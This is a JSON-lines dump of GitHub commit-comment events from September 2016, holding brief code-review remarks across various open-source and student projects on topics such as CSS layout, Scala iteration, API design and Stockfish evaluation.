{"id":"4617163920","type":"CommitCommentEvent","actor":{"login":"lolepezy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19170612,"position":303,"line":152,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/store/CacheStore.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:14:39Z","updated_at":"2016-09-26T11:14:39Z","body":"We are removing the objects while iterating through them. Not sure it's a good idea."}},"created_at":"2016-09-26T11:14:39Z"}
{"id":"4617168276","type":"CommitCommentEvent","actor":{"login":"rhuss"},"repo":{"name":"fabric8io/docker-maven-plugin"},"payload":{"comment":{"id":19170624,"position":null,"line":null,"path":null,"commit_id":"c81bfcdadbfcf4de2af3a4ee65a36cb2a3a8f3ba","created_at":"2016-09-26T11:15:40Z","updated_at":"2016-09-26T11:15:40Z","body":"You are right, we'd probably to check for the return code directly. let me do that.\r\n"}},"created_at":"2016-09-26T11:15:40Z"}
{"id":"4617169735","type":"CommitCommentEvent","actor":{"login":"jeifour"},"repo":{"name":"Jisho-org/jisho-notes"},"payload":{"comment":{"id":19170630,"position":55,"line":55,"path":"jisho-notes.md","commit_id":"59f95d879c3b4fa85d1a8683b47103082908b7d9","created_at":"2016-09-26T11:16:01Z","updated_at":"2016-09-26T11:16:01Z","body":"These searches don't work:\r\n[hampa nai](http://jisho.org/search/hampa%20nai)\r\n[hanpa nai](http://jisho.org/search/hanpa%20nai)\r\nI suspect the reason could be the spaces."}},"created_at":"2016-09-26T11:16:01Z"}
{"id":"4617169740","type":"CommitCommentEvent","actor":{"login":"lolepezy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19170631,"position":327,"line":171,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/store/CacheStore.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:16:01Z","updated_at":"2016-09-26T11:16:01Z","body":"Same here.\r\n"}},"created_at":"2016-09-26T11:16:01Z"}
{"id":"4617173336","type":"CommitCommentEvent","actor":{"login":"ak0ska"},"repo":{"name":"tylerjl/puppet-elasticsearch"},"payload":{"comment":{"id":19170639,"position":null,"line":null,"path":null,"commit_id":"2fbd573c9f0cc243678bd75ad3ebcbf2c339452c","created_at":"2016-09-26T11:16:55Z","updated_at":"2016-09-26T11:16:55Z","body":"For the spec:\r\n\r\n``` diff\r\ndiff --git a/code/spec/templates/001_elasticsearch.yml.erb_spec.rb b/code/spec/templates/001_elasticsearch.yml.erb_spec.rb\r\nindex bb0d874..7dc14c3 100644\r\n--- a/code/spec/templates/001_elasticsearch.yml.erb_spec.rb\r\n+++ b/code/spec/templates/001_elasticsearch.yml.erb_spec.rb\r\n@@ -74,4 +74,16 @@ describe 'elasticsearch.yml.erb' do\r\n       }.config))\r\n   end\r\n \r\n+  it 'should not quote numeric values' do\r\n+    harness.set(\r\n+      '@data', {\r\n+        'some.setting' => '10'\r\n+      }\r\n+    )\r\n+\r\n+    expect( YAML.load(harness.run) ).to eq( YAML.load(%q{\r\n+      some.setting: 10\r\n+    }.config))\r\n+  end\r\n+\r\n end\r\n```\r\n\r\n"}},"created_at":"2016-09-26T11:16:55Z"}
{"id":"4617173460","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170640,"position":92,"line":92,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:16:57Z","updated_at":"2016-09-26T11:16:57Z","body":"Similarly to the agencies invitations resource I think there was another path segment, i.e. `/customers/{id}/invitations/received`\r\n\r\nThen we would add `/customers/{id}/invitations/sent` and `/agencies/{arn}/invitations/received` when we add support for the customer-initiated flow."}},"created_at":"2016-09-26T11:16:57Z"}
{"id":"4617178059","type":"CommitCommentEvent","actor":{"login":"DenisCarriere"},"repo":{"name":"mapbox/concaveman"},"payload":{"comment":{"id":19170654,"position":null,"line":null,"path":null,"commit_id":"8416af3d24dbcefab231fc7f4106901dd3374295","created_at":"2016-09-26T11:18:02Z","updated_at":"2016-09-26T11:18:02Z","body":"@mourner That works :+1: Even shorter :)"}},"created_at":"2016-09-26T11:18:02Z"}
{"id":"4617180249","type":"CommitCommentEvent","actor":{"login":"InuSasha"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19170660,"position":null,"line":null,"path":null,"commit_id":"f65fa6bbe84fa0bca00fea0a5e8cb02180ef4986","created_at":"2016-09-26T11:18:35Z","updated_at":"2016-09-26T11:18:35Z","body":"@piotrasd fixed with https://github.com/LibreELEC/LibreELEC.tv/pull/767 (and already merged)"}},"created_at":"2016-09-26T11:18:35Z"}
{"id":"4617181764","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170665,"position":16,"line":16,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:18:57Z","updated_at":"2016-09-26T11:18:57Z","body":"Never mind, I see that `customerRegimeId` was added in https://github.com/hmrc/agent-client-authorisation/commit/1af4cc2ee47b0f273f22b58c0dad5cfb72740b95"}},"created_at":"2016-09-26T11:18:57Z"}
{"id":"4617182176","type":"CommitCommentEvent","actor":{"login":"WanWizard"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170667,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T11:19:03Z","updated_at":"2016-09-26T11:19:03Z","body":"Ok, thanks for the feedback."}},"created_at":"2016-09-26T11:19:03Z"}
{"id":"4617183765","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19170671,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T11:19:25Z","updated_at":"2016-09-26T11:19:25Z","body":"Wait, no that went horribly wrong. I'm uploading on windows, and when I do that then the normal '/' path delimiter is '\\', so the uploaded path are actually wrong \r\n\r\nIE, I end up with file that have names like \"this\\is\\a\\file\\name.txt\" instead of a file \"name.txt\" in folder \"this\" then \"is\" then \"a\" then \"file\". "}},"created_at":"2016-09-26T11:19:25Z"}
{"id":"4617185039","type":"CommitCommentEvent","actor":{"login":"Tauriella"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19170677,"position":null,"line":null,"path":null,"commit_id":"4b990eb7d7fda3951e640d84a5c18c90366cd26b","created_at":"2016-09-26T11:19:44Z","updated_at":"2016-09-26T11:19:44Z","body":"Awesome :+1: "}},"created_at":"2016-09-26T11:19:44Z"}
{"id":"4617187273","type":"CommitCommentEvent","actor":{"login":"aslam558"},"repo":{"name":"posabsolute/jQuery-Validation-Engine"},"payload":{"comment":{"id":19170683,"position":null,"line":null,"path":null,"commit_id":"863793cb3697d3778554ab415e38e38374ce7cb3","created_at":"2016-09-26T11:20:19Z","updated_at":"2016-09-26T11:20:19Z","body":"Thanks for your quick response..\r\nfor this i need to include ID name(selectID) for select box.\r\nis their any option whithout adding id we need to get result..\r\nlike which you give for text field. example **validationEventTrigger: \"keyup\",**"}},"created_at":"2016-09-26T11:20:19Z"}
{"id":"4617187748","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19170685,"position":48,"line":48,"path":"02/relaxr-landing-page/css/style.css","commit_id":"ee44b89bc34a40cad50b98db41bba6b32cffacfd","created_at":"2016-09-26T11:20:28Z","updated_at":"2016-09-26T11:20:28Z","body":"Since this `<a>` tag is an inline level element it wont respect the `margin-top`. It will only respect left and right margins, paddings and borders."}},"created_at":"2016-09-26T11:20:28Z"}
{"id":"4617190932","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170697,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:21:15Z","updated_at":"2016-09-26T11:21:15Z","body":"Bon je comprend de moins en moins.\r\nSi je met un int dans year, la méthode \"%s-%s\" % (self.year, self.year + 1) fonctionne, alors qu'elle ne devrait pas.\r\nPar contre avec ''.join([]), ça plante car cette méthode ne demande quer des string, mais avec ''.format(), ça fonctionne.\r\nDans tous les cas (str ou int passé pour year), l'objet est créé.\r\n"}},"created_at":"2016-09-26T11:21:15Z"}
{"id":"4617191286","type":"CommitCommentEvent","actor":{"login":"menshiyun"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19170698,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T11:21:21Z","updated_at":"2016-09-26T11:21:21Z","body":"I suggest using localtime, also marked time zones, like the iso8601 format, like \"2016-09-24T12:34:56+01:23\""}},"created_at":"2016-09-26T11:21:21Z"}
{"id":"4617197744","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170720,"position":99,"line":119,"path":"invitations.raml","commit_id":"1af4cc2ee47b0f273f22b58c0dad5cfb72740b95","created_at":"2016-09-26T11:22:59Z","updated_at":"2016-09-26T11:22:59Z","body":"implementing cancel with a DELETE interacts with this links section in an interesting way, because it means that a client has to know that it is supposed to do a DELETE on the cancel link but a PUT on the other links"}},"created_at":"2016-09-26T11:22:59Z"}
{"id":"4617199781","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170725,"position":130,"line":169,"path":"invitations.raml","commit_id":"1af4cc2ee47b0f273f22b58c0dad5cfb72740b95","created_at":"2016-09-26T11:23:31Z","updated_at":"2016-09-26T11:23:31Z","body":"we could fill in the real accept/reject URLs to make it clearer that these links link to the accept/reject resources documented elsewhere in the raml"}},"created_at":"2016-09-26T11:23:31Z"}
{"id":"4617203228","type":"CommitCommentEvent","actor":{"login":"thmo"},"repo":{"name":"sebix/python-textile"},"payload":{"comment":{"id":19170740,"position":null,"line":null,"path":null,"commit_id":"fa20408b7883e34ed4ce0900a8434bdf02bcf0bc","created_at":"2016-09-26T11:24:21Z","updated_at":"2016-09-26T11:24:21Z","body":"I would not exclude `MANIFEST.in` nor `pytest.ini` nor `requirements.txt`.\r\nAlso, `.coveragerc` could be included. "}},"created_at":"2016-09-26T11:24:21Z"}
{"id":"4617203832","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19170742,"position":null,"line":null,"path":null,"commit_id":"1bd175996e7206d5359977962834052b63a72658","created_at":"2016-09-26T11:24:30Z","updated_at":"2016-09-26T11:24:30Z","body":"Spreadsheet version of output.txt. Gives us an approximate idea of what algorithm is doing, but unfortunately I believe there are things not being printed out by the CUDA threads. It seems like only blockIdx of 14,15 and 15,15 are printing. Each has 32^2 threads (threadIdx of 0~31,0~31), so in total we are only getting 2048 out of the 32^3 (32768, or 6.25%) potential outputs.\r\n\r\nAnyway it gives us some insight as to how to tackle this problem. I would say the following two things are things we can proceed to experiment on:\r\n1. Try to parallelize the for-loop in the mm_kernel() function. Maybe instead of a 2D block of CUDA threads (or is that how the architecture works?) we can try a 3D block? Not sure how it'd speed up, but then again, lots of other things for this assignment (as well as other topics) that I'm not sure about.\r\n2. Mess around with block size and dimensions size? Again, no idea how it'd help.\r\n\r\nI'll copy and paste this tl;dr in the comment to this file again, so as to facilitate easier finding the next day.\r\n\r\nP.S.: Can we have a record on black and white how fast this shit currently runs? So that we have a benchmark.\r\n\r\nP.P.S.: GOD DAMN IT I KNEW IT WAS RIGHT TO COPY THIS INTO CLIPBOARD, THEY TRUNCATED MY TL;DR!\r\n\r\nP.P.P.S.: Oh God damn it no commenting on files, so I have to comment on commits. ggwp"}},"created_at":"2016-09-26T11:24:30Z"}
{"id":"4617203981","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19170743,"position":null,"line":null,"path":null,"commit_id":"abf9f9f74ca36d9fb96c636525172067c3b96691","created_at":"2016-09-26T11:24:32Z","updated_at":"2016-09-26T11:24:32Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1037)"}},"created_at":"2016-09-26T11:24:32Z"}
{"id":"4617208645","type":"CommitCommentEvent","actor":{"login":"bestander"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19170757,"position":18,"line":18,"path":"local-cli/upgrade/upgrade.js","commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T11:25:42Z","updated_at":"2016-09-26T11:25:42Z","body":"Any chance you could not use yeoman?\r\nWe are planning to get rid of it in favor of something smaller"}},"created_at":"2016-09-26T11:25:42Z"}
{"id":"4617211651","type":"CommitCommentEvent","actor":{"login":"bensLine"},"repo":{"name":"PokemonGoers/PredictPokemon-2"},"payload":{"comment":{"id":19170764,"position":null,"line":null,"path":null,"commit_id":"6014fc5741bb9b599e28f53e63e0d287df05253e","created_at":"2016-09-26T11:26:25Z","updated_at":"2016-09-26T11:26:25Z","body":"@sacdallago @goldbergtatyana We do not use Wikipedia anymore. Instead, we use the density from a csv file http://neo.sci.gsfc.nasa.gov/view.php?datasetId=SEDAC_POP and density ranges e.g. more than 1000 == urban and so on. @marwage can give you more details if needed :)"}},"created_at":"2016-09-26T11:26:25Z"}
{"id":"4617211863","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19170765,"position":101,"line":101,"path":"02/relaxr-landing-page/css/style.css","commit_id":"ee44b89bc34a40cad50b98db41bba6b32cffacfd","created_at":"2016-09-26T11:26:28Z","updated_at":"2016-09-26T11:26:28Z","body":"Instead of putting a `margin-left` on both the title and text, you could have used `padding-left` on the `#benefits` container."}},"created_at":"2016-09-26T11:26:28Z"}
{"id":"4617213370","type":"CommitCommentEvent","actor":{"login":"michaelgiesler"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19170766,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-26T11:26:52Z","updated_at":"2016-09-26T11:26:52Z","body":"potentielle Dinge in den Menüs (unsortiert):\r\n- Startseite\r\n- \"Zapfunktion\"\r\n- Impressum\r\n- Backend (nur für berechtigte Benutzer)\r\n- Registrierungsformular\r\n- Login\r\n- Ausloggen\r\n- eigenes Profil\r\n- Blog\r\n- github\r\n- Social Media (Facebook, Twitter, etc.)\r\n- Crowdfunding (derzeit nur Patreon)\r\n- AGB?\r\n- ein recht präsenter Link zu \"Was zum Teufel ist Dembelo überhaupt?\"\r\n- ...\r\n\r\nFällt euch sonst noch was ein?"}},"created_at":"2016-09-26T11:26:52Z"}
{"id":"4617213643","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19170770,"position":1,"line":1,"path":"22","commit_id":"abf9f9f74ca36d9fb96c636525172067c3b96691","created_at":"2016-09-26T11:26:56Z","updated_at":"2016-09-26T11:26:56Z","body":"sdf"}},"created_at":"2016-09-26T11:26:56Z"}
{"id":"4617214698","type":"CommitCommentEvent","actor":{"login":"itsjeyd"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19170771,"position":32,"line":32,"path":"openedx/core/lib/xblock_builtin/xblock_discussion/static/js/discussion_classes.js","commit_id":"117350e2aad0aacf7e6218b65c0bdab2faf33d38","created_at":"2016-09-26T11:27:12Z","updated_at":"2016-09-26T11:27:12Z","body":"@ziafazal The `base_url` for this is `REQUIRE_BASE_URL`."}},"created_at":"2016-09-26T11:27:12Z"}
{"id":"4617216043","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19170776,"position":141,"line":141,"path":"02/relaxr-landing-page/css/style.css","commit_id":"ee44b89bc34a40cad50b98db41bba6b32cffacfd","created_at":"2016-09-26T11:27:32Z","updated_at":"2016-09-26T11:27:32Z","body":"hmm, doesn't look like you needed the `padding-top`. Was this related to the issue you had in class?"}},"created_at":"2016-09-26T11:27:32Z"}
{"id":"4617217297","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19170778,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T11:27:49Z","updated_at":"2016-09-26T11:27:49Z","body":"The new ones can connect properly even if the old ones aren't dropped. As soon as a responder successfully connects, all other responders will be dropped anyways. But dropping inactive responders is only a form of cleanup, nothing critical."}},"created_at":"2016-09-26T11:27:49Z"}
{"id":"4617220276","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"cburd87/Stockfish"},"payload":{"comment":{"id":19170782,"position":null,"line":null,"path":null,"commit_id":"19985a667b6c39b57cce38ebaf51a5bcfc838a78","created_at":"2016-09-26T11:28:32Z","updated_at":"2016-09-26T11:28:32Z","body":"Well, this is endgame ! You need an IDE and step through the code...\r\n\r\nAt line 865, when there is only 2 bishops and some pawns,\r\nei.me->game_phase() is 0\r\n(you can see this in position.cpp line 413)\r\n\r\nSo we have\r\nValue v = mg_value(score) * 0 + eg_value(score) * int(128 - 0) * sf / 64;\r\n             = eg_value(score) * 2 * sf;\r\n\r\nand next line  we divide by 128.\r\nat the end of the day the final evaluation is\r\neg_value(score) * sf / 64;\r\n\r\n\r\n"}},"created_at":"2016-09-26T11:28:32Z"}
{"id":"4617220620","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jieunpark119/First-Fewd-Repo"},"payload":{"comment":{"id":19170783,"position":21,"line":21,"path":"02/relaxr-landing-page/index.html","commit_id":"ee44b89bc34a40cad50b98db41bba6b32cffacfd","created_at":"2016-09-26T11:28:38Z","updated_at":"2016-09-26T11:28:38Z","body":"Watch out for extra spaces in between your attribute settings (there's a space after \"class\"."}},"created_at":"2016-09-26T11:28:38Z"}
{"id":"4617222176","type":"CommitCommentEvent","actor":{"login":"tobi5648"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19170784,"position":null,"line":null,"path":null,"commit_id":"d6995b0941c33512107238cbb7148811ce6be4b7","created_at":"2016-09-26T11:29:02Z","updated_at":"2016-09-26T11:29:02Z","body":"Er det en anden comment metode"}},"created_at":"2016-09-26T11:29:02Z"}
{"id":"4617222516","type":"CommitCommentEvent","actor":{"login":"miri64"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":19170787,"position":69,"line":69,"path":"sys/include/evtimer.h","commit_id":"6a978a1fd4dd8a4e212678c0ca9d77f179e574a4","created_at":"2016-09-26T11:29:07Z","updated_at":"2016-09-26T11:29:07Z","body":"Shouldn't the handler be event-type specific?"}},"created_at":"2016-09-26T11:29:07Z"}
{"id":"4617223392","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19170791,"position":1,"line":1,"path":"22","commit_id":"abf9f9f74ca36d9fb96c636525172067c3b96691","created_at":"2016-09-26T11:29:20Z","updated_at":"2016-09-26T11:29:20Z","body":"sdfsdfsdf"}},"created_at":"2016-09-26T11:29:20Z"}
{"id":"4617223505","type":"CommitCommentEvent","actor":{"login":"miri64"},"repo":{"name":"kaspar030/RIOT"},"payload":{"comment":{"id":19170792,"position":61,"line":61,"path":"sys/include/evtimer.h","commit_id":"6a978a1fd4dd8a4e212678c0ca9d77f179e574a4","created_at":"2016-09-26T11:29:21Z","updated_at":"2016-09-26T11:29:21Z","body":"How are different types of events identified?"}},"created_at":"2016-09-26T11:29:21Z"}
{"id":"4617231084","type":"CommitCommentEvent","actor":{"login":"dkasak"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19170799,"position":12,"line":211,"path":"autoload/neomake/utils.vim","commit_id":"1ac37c1679f272f0c1f334c96c8e15241dca6e5b","created_at":"2016-09-26T11:31:11Z","updated_at":"2016-09-26T11:31:11Z","body":"This modifies the dictionary reference and doesn't return anything so the return value is 0 by default."}},"created_at":"2016-09-26T11:31:11Z"}
{"id":"4617231831","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19170801,"position":31,"line":31,"path":"src/main/java/impl/ByteBufferPacket.java","commit_id":"962f0b27637c16fb982f10bddc010604707d9689","created_at":"2016-09-26T11:31:22Z","updated_at":"2016-09-26T11:31:22Z","body":"Unnecessary method"}},"created_at":"2016-09-26T11:31:22Z"}
{"id":"4617232202","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19170804,"position":35,"line":35,"path":"src/main/java/impl/ByteBufferPacket.java","commit_id":"962f0b27637c16fb982f10bddc010604707d9689","created_at":"2016-09-26T11:31:28Z","updated_at":"2016-09-26T11:31:28Z","body":"Unnecessary method"}},"created_at":"2016-09-26T11:31:28Z"}
{"id":"4617232481","type":"CommitCommentEvent","actor":{"login":"gastounage"},"repo":{"name":"abique/conf"},"payload":{"comment":{"id":19170805,"position":4,"line":227,"path":"bash.d/alias.bash","commit_id":"bc919a284251af179f372f1f2f9ca89fa4840d9b","created_at":"2016-09-26T11:31:32Z","updated_at":"2016-09-26T11:31:32Z","body":";-)"}},"created_at":"2016-09-26T11:31:32Z"}
{"id":"4617233146","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170808,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:31:42Z","updated_at":"2016-09-26T11:31:42Z","body":"Bon,\r\nje viens de tester mes tests, en affichant le resultat de la méthode ```is_member(user,group)```.\r\nCa renvoie la bonne valeur, que ce soit en mettant un int ou un string dans `year`.\r\nDonc l'objet est bien sauvegarder , les signaux post_create et post_delete sont bien envoyé, ce qui veux dire qu'il n'y a pas d'erreur SQL (c'est pour ça que j'utilise les signaux post_ et pas pre_, pour être sur que ça va dans la DB).\r\nJe n'ai donc aucune explication logique, si ce n'est que je n'aime vraiment pas le typage dynamique!\r\nJe vais changer la construction et mettre un int dans year."}},"created_at":"2016-09-26T11:31:42Z"}
{"id":"4617233660","type":"CommitCommentEvent","actor":{"login":"dkasak"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19170811,"position":8,"line":19,"path":"tests/utils.vader","commit_id":"1ac37c1679f272f0c1f334c96c8e15241dca6e5b","created_at":"2016-09-26T11:31:50Z","updated_at":"2016-09-26T11:31:50Z","body":"The 0 gets returned here."}},"created_at":"2016-09-26T11:31:50Z"}
{"id":"4617234076","type":"CommitCommentEvent","actor":{"login":"booo"},"repo":{"name":"KenTacki/ca.berlin.freifunk.net"},"payload":{"comment":{"id":19170812,"position":6,"line":77,"path":"manage.py","commit_id":"9b5ebb9c3696b2abb6ddc3a3e693fa05431cbd33","created_at":"2016-09-26T11:31:57Z","updated_at":"2016-09-26T11:31:57Z","body":"Maybe this should be the command \"certificates list\"? Same for the certificate resend command \"certificate send\". Maybe the send command should take the id as required argument and the mail as optional argument? Something along the lines: \"certificate send <id> [<mail>]\""}},"created_at":"2016-09-26T11:31:57Z"}
{"id":"4617234662","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19170813,"position":7,"line":7,"path":"src/main/java/model/UserData.java","commit_id":"962f0b27637c16fb982f10bddc010604707d9689","created_at":"2016-09-26T11:32:06Z","updated_at":"2016-09-26T11:32:06Z","body":"Better to implement interface ByteBufferSerializableObject "}},"created_at":"2016-09-26T11:32:06Z"}
{"id":"4617235631","type":"CommitCommentEvent","actor":{"login":"dkasak"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19170836,"position":10,"line":21,"path":"tests/utils.vader","commit_id":"1ac37c1679f272f0c1f334c96c8e15241dca6e5b","created_at":"2016-09-26T11:32:19Z","updated_at":"2016-09-26T11:32:19Z","body":"This passes because in vimscript 'foo' == 0 :("}},"created_at":"2016-09-26T11:32:19Z"}
{"id":"4617236777","type":"CommitCommentEvent","actor":{"login":"chillskull"},"repo":{"name":"chillskull/React-Misc"},"payload":{"comment":{"id":19170838,"position":null,"line":null,"path":null,"commit_id":"2bc53b4df464694873ca41b5b4c690e7da649da6","created_at":"2016-09-26T11:32:36Z","updated_at":"2016-09-26T11:32:36Z","body":"UL'd files"}},"created_at":"2016-09-26T11:32:36Z"}
{"id":"4617238180","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19170842,"position":null,"line":null,"path":null,"commit_id":"ce8cbdda5c3a39905fc7d7ada0f7b12abdb97665","created_at":"2016-09-26T11:32:56Z","updated_at":"2016-09-26T11:32:56Z","body":"Score of see6 vs base: 540 - 517 - 1511  [0.504] 2568\r\nELO difference: 3.11 +/- 8.61 tc=8+0.08 option.Threads=1 option.Hash=4"}},"created_at":"2016-09-26T11:32:56Z"}
{"id":"4617239183","type":"CommitCommentEvent","actor":{"login":"toxa-ak88"},"repo":{"name":"Adam198590/JavaSerializatorProj"},"payload":{"comment":{"id":19170844,"position":19,"line":19,"path":"src/main/java/util/ByteUtil.java","commit_id":"962f0b27637c16fb982f10bddc010604707d9689","created_at":"2016-09-26T11:33:11Z","updated_at":"2016-09-26T11:33:11Z","body":"BufferOverflowEception occurs.\r\nString.length() != String.getBytes().length"}},"created_at":"2016-09-26T11:33:11Z"}
{"id":"4617243201","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19170852,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T11:34:08Z","updated_at":"2016-09-26T11:34:08Z","body":"253 connected responders will clog the path and new responders can't connect if the initiator does not clean up. There's a test for that in the server: https://github.com/saltyrtc/saltyrtc-server-python/blob/master/tests/test_protocol.py#L931"}},"created_at":"2016-09-26T11:34:08Z"}
{"id":"4617246259","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170855,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:34:53Z","updated_at":"2016-09-26T11:34:53Z","body":"PS : j'ai supprimer l'écoute des signaux pour vérifier que les tests plantent sur l'ajout (forcement la suppression du groupe fonctionne puisqu'il ne l'ajoute pas), et ils plantent bien où ils doivent planter."}},"created_at":"2016-09-26T11:34:53Z"}
{"id":"4617248142","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19170859,"position":null,"line":null,"path":null,"commit_id":"29fa42274b4fe51d3ffdd295920688cb248a4fb2","created_at":"2016-09-26T11:35:19Z","updated_at":"2016-09-26T11:35:19Z","body":"Ouch. You did a really hard work."}},"created_at":"2016-09-26T11:35:19Z"}
{"id":"4617253004","type":"CommitCommentEvent","actor":{"login":"silasary"},"repo":{"name":"bakert/Magic-Discord-Bot"},"payload":{"comment":{"id":19170869,"position":9,"line":9,"path":"TODO","commit_id":"b43a07b545ff5a08014c32931b7a3a5a309325a9","created_at":"2016-09-26T11:36:31Z","updated_at":"2016-09-26T11:36:31Z","body":"Do we want to open these as issues, rather than as a text file in the repo?"}},"created_at":"2016-09-26T11:36:31Z"}
{"id":"4617253569","type":"CommitCommentEvent","actor":{"login":"jeifour"},"repo":{"name":"Jisho-org/jisho-notes"},"payload":{"comment":{"id":19170872,"position":7,"line":7,"path":"README.md","commit_id":"a7fc9c8c842109f35e4b49ef2666f55b38dff791","created_at":"2016-09-26T11:36:39Z","updated_at":"2016-09-26T11:36:39Z","body":"In order to always show all appropriate entries, the search words in the database should be consistent in how they include hiragana/romaji version of words. I reflected this practice in my latest commits:\r\n1) Include hiragana for all appropriate words.\r\n2) Include romaji for a word only if jisho.org is not converting it into the appropriate hiragana itself (for example \"dewanai\" in entry Id 1)\r\nBy using this method consistenly, it doesn't matter if the user searches for the hiragana version or the romaji version of a word, jisho will always render all appropriate entries."}},"created_at":"2016-09-26T11:36:39Z"}
{"id":"4617254255","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19170874,"position":10,"line":15,"path":"Entities/Department.cs","commit_id":"cbc622bd69fb4c70d7c64e9a8e9e4f4c8675b08e","created_at":"2016-09-26T11:36:49Z","updated_at":"2016-09-26T11:36:49Z","body":"Typisk har man blot følgende #regions:\r\n\r\n- Constants\r\n- Fields\r\n-Constructors\r\n- Methods\r\n- Properties.\r\n\r\nPrøv at ændre din kode til det."}},"created_at":"2016-09-26T11:36:49Z"}
